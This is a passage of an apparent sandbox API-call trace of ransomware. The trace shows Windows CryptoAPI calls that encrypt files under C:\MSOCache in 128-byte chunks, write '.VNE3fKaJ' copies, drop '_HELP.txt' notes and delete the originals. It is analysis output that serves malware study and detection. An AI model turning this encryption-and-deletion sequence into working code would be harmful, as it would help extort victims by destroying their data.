lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0120.010] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.010] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.011] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.011] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.011] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.011] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8f8 [0120.011] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.029] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.029] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.029] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.029] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.030] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.030] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.030] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.031] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.031] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.031] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.032] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.032] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.032] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.032] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x78, lpOverlapped=0x0) returned 1 [0120.032] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x78, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.032] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.032] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x0, lpOverlapped=0x0) returned 1 [0120.032] CloseHandle (hObject=0x340) returned 1 [0120.032] CloseHandle (hObject=0x344) returned 1 [0120.032] CryptDestroyHash (hHash=0x284d528) returned 1 [0120.032] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.033] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.033] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.034] GetFileType (hFile=0x344) returned 0x1 [0120.034] GetLastError () returned 0xb7 [0120.034] SetLastError (dwErrCode=0xb7) [0120.034] GetLastError () returned 0xb7 [0120.034] SetLastError (dwErrCode=0xb7) [0120.034] WriteFile (in: hFile=0x344, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.035] CloseHandle (hObject=0x344) returned 1 [0120.035] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0120.036] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0120.036] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0120.036] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0120.036] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0120.064] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0120.064] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.064] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PowerPointMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointMUI.msi", lpUsedDefaultChar=0x0) returned 18 [0120.064] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x344 [0120.064] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.065] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.066] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.066] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.066] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.066] GetFileSize (in: hFile=0x344, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x263400 [0120.066] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.090] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.090] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.091] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.091] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.091] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.091] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.091] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.091] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.092] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.092] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.092] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, 